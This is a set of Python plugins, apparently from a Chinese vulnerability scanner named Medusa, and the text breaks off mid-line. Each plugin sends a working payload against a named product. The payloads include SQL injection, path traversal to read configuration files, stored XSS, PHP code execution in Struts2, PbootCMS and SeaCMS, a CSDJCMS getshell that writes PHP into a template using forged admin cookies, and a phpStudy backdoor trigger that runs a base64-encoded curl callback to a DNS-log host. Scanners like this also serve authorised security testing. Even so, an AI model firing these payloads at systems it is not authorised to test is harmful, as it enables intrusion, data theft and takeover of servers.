def medusa(Url,RandomAgent,UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port urls = [ "/Rat/ebid/viewInvite3.asp?InviteId=0000002852", "/Rat/ebid/viewInvite4.asp?InviteId=0000002852", "/Rat/ebid/viewInvite5.asp?InviteId=0000002852", "/Rat/ebid/viewInvite6.asp?InviteId=0000002852", "/Rat/ebid/viewInvite2.asp?InviteId=0000002852", "/Rat/ebid/viewInvite1.asp?InviteId=0000002852", "/Rat/EBid/ViewClarify1.asp?InviteId=11", "/Rat/EBid/ViewClarify.asp?InviteId=11", "/Rat/EBid/AuditForm/AuditForm_ExpertForm.asp?InviteId=11", ] data = "%27%20and%20(CHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(88)%2BCHAR(81)%2BCHAR(49)%2BCHAR(55))%3E0--" for payload in urls: try: payload_url = scheme + "://" + url +":"+ str(port)+payload+data headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url,headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if con.lower().find("testXQ17") != -1: Medusa = "{}存在一采通电子采购系统SQL注入漏洞\r\n 验证数据:\r\n返回内容:{}\r\npayload:{}\r\n".format(url,con,payload_url) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port payloads = [ '..././http/..././config/config_db.php', '.....///http/.....///config/config_db.php', 'http\..\..\config\config_db.php', ] for payload in payloads: try: payload_url = scheme + "://" + url + ":" + str( port) + '/include/thumb.php?dir=' + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('con_db_host') != -1 and con.find( '<?php') != -1 and con.find( 'con_db_por') != -1 and con.find('con_db_id') != -1: Medusa = "{}存在Metinfo任意文件读取漏洞\r\n 漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/user/do.php?ac=edit@op=zl" payload_url = scheme + "://" + url + ":" + str(port) + payload referer = scheme + "://" + url headers = { "User-Agent": RandomAgent, "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "{}/admin/admin_t ... ;file=artindex.html".format(referer), "Cookie": "CS_AdminID=1; CS_AdminUserName=1; CS_AdminPassWord=1; CS_Quanx=0_1,1_1,1_2,1_3,1_4,1_5,2_1,2_2,2_3,2_4,2_5,2_6,2_7,3_1,3_2,3_3,3_4,4_1,4_2,4_3,4_4,4_5,4_6,4_7,5_1,5_2,5_3,5_4,5_5,6_1,6_2,6_3,7_1,7_2,8_1,8_2,8_3,8_4; CS_Login=a3f5f5a662e8a36525f4794856e2d0a2; PHPSESSID=48ogo025b66lkat9jtc8aecub1; CNZZDATA3755283=cnzz_eid%3D1523253931-1364956519-http%253A%252F%252Fwww.djkao.com%26ntime%3D1364956519%26cnzz_a%3D1%26retime%3D1365129491148%26sin%3D%26ltime%3D1365129491148%26rtime%3D0; bdshare_firstime=1365129335963", "Connection": "keep-alive", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "169" } data = "CS_Name=aaaaaa&CS_Email=a%40qq.com&CS_Nichen=aaaaaa&CS_Sex=0&CS_City=%C1%C9%C4%FE%CA%A1&CS_QQ=111111111&CS_Qianm=<isindex type=image src=1 onerror=alert(/'xss'/)>" s = requests.session() resp = s.post(payload_url, data=data, headers=headers, timeout=6, verify=False) con = resp.text if con.find('PHP Version') != -1 and con.find('System'): Medusa = "{}存在CSDJCMS存储型跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payloads = ["/vpn/../vpns/services.html", "/vpn/../vpns/cfg/smb.conf"] for payload in payloads: payload_url = scheme + '://' + url + ':' + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("encrypt password") != -1: Medusa = "{}存在Citrix网关路径遍历漏洞\r\n 验证数据:\r\nPOC:{}\r\n返回内容:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def Main(Url, FileName, Values, ProxyIp): WriteFile = ClassCongregation.WriteFile( FileName) # 声明调用类集合中的WriteFile类,并传入文件名字(这一步是必须的) ua = ClassCongregation.UserAgentS(Values) #传入用户输入用户指定的浏览器头 RandomAgent = ua.UserAgent() #获取生成的头文件 try: Medusa = Cms.Wordpress.Wordpress_admin_ajax_filedownload.medusa( Url, RandomAgent, ProxyIp) WriteFile.Write(Medusa) except: pass try: Medusa = Cms.Wordpress.Wordpress_display_widgets_backdoor.medusa( Url, RandomAgent, ProxyIp) WriteFile.Write(Medusa) except: pass try: Medusa = Cms.Wordpress.Wordpress_plugin_azonpop_sqli.medusa( Url, RandomAgent, ProxyIp) WriteFile.Write(Medusa) except: pass try: Medusa = Cms.Wordpress.Wordpress_plugin_mailpress_rce.medusa( Url, RandomAgent, ProxyIp) WriteFile.Write(Medusa) except: pass try: Medusa = Cms.Wordpress.Wordpress_plugin_ShortCode_lfi.medusa( Url, RandomAgent, ProxyIp) WriteFile.Write(Medusa) except: pass try: Medusa = Cms.Wordpress.Wordpress_woocommerce_code_exec.medusa( Url, RandomAgent, ProxyIp) WriteFile.Write(Medusa) except: pass
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/bugfree/Login.php" payload_url = scheme + "://" + url + ":" + str(port) + payload data = { 'xajax': 'xSelectLanguage', 'xajaxargs[]': '../../5555.txt%00', 'xajaxr': '1377604187765' } headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.post(payload_url, headers=headers, data=data, timeout=6, verify=False) con = resp.text code = resp.status_code if con.find("System") != -1 and con.find("Build Date") != -1: Medusa = "{}存在BugFree文件包含漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: RD = ClassCongregation.randoms().result(20) payload = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1" data = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert({})%3e&submit=Submit'''.format( RD) payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find(RD) != -1: Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload_url = scheme + "://" + url + ':' + str(port) + payload headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', "Content-Type": "application/x-www-form-urlencoded", 'User-Agent': RandomAgent, } s = requests.session() resp = s.post(payload_url, data=post_data, headers=headers, proxies=proxies, timeout=5, verify=False) resp2 = s.get(payload_url, headers=headers, timeout=5, proxies=proxies, verify=False) con = resp.text con2 = resp2.text if con2.lower().find('navigation.php') != -1 and con.lower().find( 'frame_navigation') != -1: Medusa = "{}存在phpstudy_phpmyadmin默认密码漏洞 \r\n漏洞详情:\r\nPayload:{}\r\nPost:{}\r\n".format( url, payload_url, post_data) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/k/cms/cmsmadesimple/install/index.php" data = '''docroot=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(cscan-hyhmnn)%3e")&docpath=%2Fhome%2Fk%2Fpublic_html%2Fcms%2Fcmsmadesimple&querystr=page&frontendlang=en_US&umask=022&host=localhost&dbms=mysqli&database=cms&username=root&password=superpass&db_port=0&timezone=Europe%2FBerlin&prefix=cms_&createtables=1&email_accountinfo=0&adminemail=admin%40here.com&adminusername=admin&adminpassword=password&page=7&default_cms_lang=en_US''' payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find( '''<a href="$("<img/src='x'/onerror=alert(cscan-hyhmnn)>''' ) != -1: Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/search.php?phpinfo()" payload_url = scheme + "://" + url + ":" + str(port) + payload payload_data = "searchtype=5&searchword={if{searchpage:year}&year=:as{searchpage:area}}&area=s{searchpage:letter}&letter=ert{searchpage:lang}&yuyan=($_SE{searchpage:jq}&jq=RVER{searchpage:ver}&&ver=[QUERY_STRING]));/*" headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'en', 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': scheme + '://' + url, 'Referer': payload } s = requests.session() resp = s.post(payload_url, headers=headers, data=payload_data, timeout=5, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('System') != -1 and con.find( 'Compiler' ) != -1 and con.find('Build Date') != -1 and con.find( 'IPv6 Support') != -1 and con.find('Configure Command') != -1: Medusa = "{} 存在远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format( url, payload_url, con.encode(encoding='utf-8')) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 ClassCongregation.WriteFile().result( str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url, RandomAgent, Token, proxies=None): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port DL = ClassCongregation.Dnslog() commandS = ('''system("curl http://{}");''').format(DL.dns_host()) cmd = base64.b64encode(commandS.encode('utf-8')) try: payload_url = scheme + "://" + url + ':' + str(port) + payload headers = { 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '******', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 'Sec-Fetch-Site': 'none', 'accept-charset': cmd, 'Accept-Encoding': 'gzip,deflate', 'Accept-Language': 'zh-CN,zh;q=0.9', 'User-Agent': RandomAgent } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=5, proxies=proxies, verify=False) if DL.result(): # if True: Medusa = "{} 存在phpStudyBackdoor脚本漏洞\r\n漏洞详情:\r\nPayload:{}\r\nHeader:{}\r\nDNSLOG内容:{}\r\n".format( url, payload_url, headers, DL.dns_host()) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, Token).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url, RandomAgent, Token, proxies=None): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port payload_url = scheme + "://" + url + ':' + str(port) + payload host = url + ':' + str(port) headers = { 'Host': host, 'Accept-Encoding': 'gzip, deflate', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'User-Agent': RandomAgent, 'Connection': 'close', 'DNT': '1', 'Upgrade-Insecure-Requests': '1' } try: s = requests.session() resp = s.get(payload_url, headers=headers, proxies=proxies, timeout=5, allow_redirects=False) con = resp.headers['Location'] code = resp.status_code if code == 302 and con.lower().find('54289') != -1: Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n影响版本:版本低于<=Struts2_3_34,Struts2_5_16\r\nPayload:{}\r\n".format( url, payload_url) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, Token).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload_url = scheme + "://" + url + ":" + str(port) referer = scheme + "://" + url headers = { "Host": "{}".format(url), "User-Agent": RandomAgent, "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "{}/admin/admin_t ... ;file=artindex.html".format(referer), "Cookie": "S_Permission=1,2,3,4,5,6,7,8,9,10,11,12,13,14,15; S_Login=d8d998f3eb371c2009acd8580c1821d0; S_AdminUserName=1; S_AdminPassWord=1; S_AdminID=1; CNZZDATA4170884=cnzz_eid%3D1098390420-1364934762-http%253A%252F%252Fwww.hshxs.com%26ntime%3D1364935608%26cnzz_a%3D19%26retime%3D1365111972892%26sin%3Dnone%26ltime%3D1365111972892%26rtime%3D0; bdshare_firstime=1365107576347; PHPSESSID=u6kd9d6f18fhfr9bi4if6agcj6", "Connection": "keep-alive", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "169" } data = "FileName=cs-bottom.php&content=%3C%3Fphp+phpinfo+%3F%3E&folder=..%2Fskins%2Findex%2Fhtml%2F&tempname=%C4%AC%C8%CF%C4%A3%B0%E6&Submit=%D0%DE%B8%C4%B5%B1%C7%B0%C4%A3%B0%E5" s = requests.session() resp = s.post(payload_url, data=data, headers=headers, timeout=6, verify=False) con = resp.text if con.find('PHP Version') != -1 and con.find('System'): Medusa = "{}存在CSDJCMSGetshell\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, Token, proxies=None): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/install/phpinfo.php" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('System') != -1 and con.find( 'Configure Command') != -1 and con.find( 'PHP') != -1 and con.find('IPv6 Support') != -1: Medusa = "{}存在php探针漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, Token).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, Token, proxies=None): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/index.php/Message/add" data = "contacts[content`,`create_time`,`update_time`) VALUES ('1', '1' ,1 and updatexml(1,concat(0x3a,user()),1) );-- a] = 11231231313&mobile=2&content=3" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } resp = requests.post(payload_url, headers=headers, timeout=6, data=data, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('错误信息') != -1 and con.find( '''(`content`,`create_time`,`update_time`) VALUES ('1', '1' ,1 and updatexml(1,concat(0x3a,user()),1) )''' ) != -1 and con.find('执行SQL发生错误') != -1: Medusa = "{} 存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, Token).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def Main(Url, FileName, Values, ProxyIp): WriteFile = ClassCongregation.WriteFile( FileName) # 声明调用类集合中的WriteFile类,并传入文件名字(这一步是必须的) ua = ClassCongregation.UserAgentS(Values) #传入用户输入用户指定的浏览器头 RandomAgent = ua.UserAgent() #获取生成的头文件 Medusa = [ JenkinsArbitraryFileReadVulnerability.medusa(Url, RandomAgent, ProxyIp), JenkinsRemoteCommandExecutionVulnerability.medusa( Url, RandomAgent, ProxyIp), JenkinsConfigurationErrorCausesUnauthorizedCodeExecutionVulnerability. medusa(Url, RandomAgent, ProxyIp) ] try: for i in tqdm(Medusa, ascii=True, desc="Jenkins plugin progress"): WriteFile.Write(str(i)) except: pass
def Main(Url, FileName, Values, ProxyIp): WriteFile = ClassCongregation.WriteFile( FileName) # 声明调用类集合中的WriteFile类,并传入文件名字(这一步是必须的) ua = ClassCongregation.UserAgentS(Values) #传入用户输入用户指定的浏览器头 RandomAgent = ua.UserAgent() #获取生成的头文件 try: Medusa = Cms.Umail.Umail_sessionid_access.medusa( Url, RandomAgent, ProxyIp) WriteFile.Write(Medusa) except: pass #print("[-]NginxDirectoryTraversalVulnerability Scan error") try: Medusa = Cms.Umail.Umail_physical_path.medusa(Url, RandomAgent, ProxyIp) WriteFile.Write(Medusa) except: pass
def Main(Url, FileName, Values, ProxyIp): WriteFile = ClassCongregation.WriteFile( FileName) # 声明调用类集合中的WriteFile类,并传入文件名字(这一步是必须的) ua = ClassCongregation.UserAgentS(Values) #传入用户输入用户指定的浏览器头 RandomAgent = ua.UserAgent() #获取生成的头文件 try: Medusa = Cms.Joomla.Joomla_com_docman_lfi.medusa( Url, RandomAgent, ProxyIp) WriteFile.Write(Medusa) except: pass #print("[-]NginxDirectoryTraversalVulnerability Scan error") try: Medusa = Cms.Joomla.Joomla_index_list_sqli.medusa( Url, RandomAgent, ProxyIp) WriteFile.Write(Medusa) except: pass
def Main(Url, FileName, Values, ProxyIp): WriteFile = ClassCongregation.WriteFile( FileName) # 声明调用类集合中的WriteFile类,并传入文件名字(这一步是必须的) ua = ClassCongregation.UserAgentS(Values) #传入用户输入用户指定的浏览器头 RandomAgent = ua.UserAgent() #获取生成的头文件 try: Medusa = Cms.Metinfo.Metinfo_login_check_sqli.medusa( Url, RandomAgent, ProxyIp) WriteFile.Write(Medusa) except: pass #print("[-]NginxDirectoryTraversalVulnerability Scan error") try: Medusa = Cms.Metinfo.Metinfo_getpassword_sqli.medusa( Url, RandomAgent, ProxyIp) WriteFile.Write(Medusa) except: pass
def Main(Url, FileName, Values, ProxyIp): WriteFile = ClassCongregation.WriteFile( FileName) # 声明调用类集合中的WriteFile类,并传入文件名字(这一步是必须的) ua = ClassCongregation.UserAgentS(Values) #传入用户输入用户指定的浏览器头 RandomAgent = ua.UserAgent() #获取生成的头文件 try: Medusa = Cms.Opensns.Opensns_index_getshell.medusa( Url, RandomAgent, ProxyIp) WriteFile.Write(Medusa) except: pass #print("[-]NginxDirectoryTraversalVulnerability Scan error") try: Medusa = Cms.Opensns.Opensns_index_arearank.medusa( Url, RandomAgent, ProxyIp) WriteFile.Write(Medusa) except: pass
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/index.php/index/index?keyword={pboot:if(1)$a=$_GET[b];$a();//)})}}{/pboot:if}&b=phpinfo" payload_url = scheme + "://" + url + ":" + str(port) + payload header = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } req = request.Request( payload_url, headers=header, ) response = request.urlopen(req) con = response.read().decode('utf8') # 如果编码报错,去除HTTP Header中的gzip参数即可 code = response.getcode() if code == 200 and con.find('System') != -1 and con.find( 'Build Date') != -1 and con.find( 'Compiler') != -1 and con.find('PHP Version') != -1: Medusa = "{} 存在PbootCMS命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port PayloadUrl = scheme + "://" + url + ':' + str(port) + Payload host = url + ':' + str(port) headers = { 'Host': host, 'Accept-Encoding': 'gzip, deflate', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'User-Agent': RandomAgent, 'Connection': 'close', } try: resp = requests.get(PayloadUrl, headers=headers, timeout=5, proxies=proxies, allow_redirects=False) con = resp.headers.get('Set-Cookie') code = resp.status_code if code == 302 and con.lower().find('a=1') != -1: Medusa = "{} 存在Nginx_CRLF注入漏洞\r\n漏洞详情:\r\nPayload:{}\r\n".format( url, PayloadUrl) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as 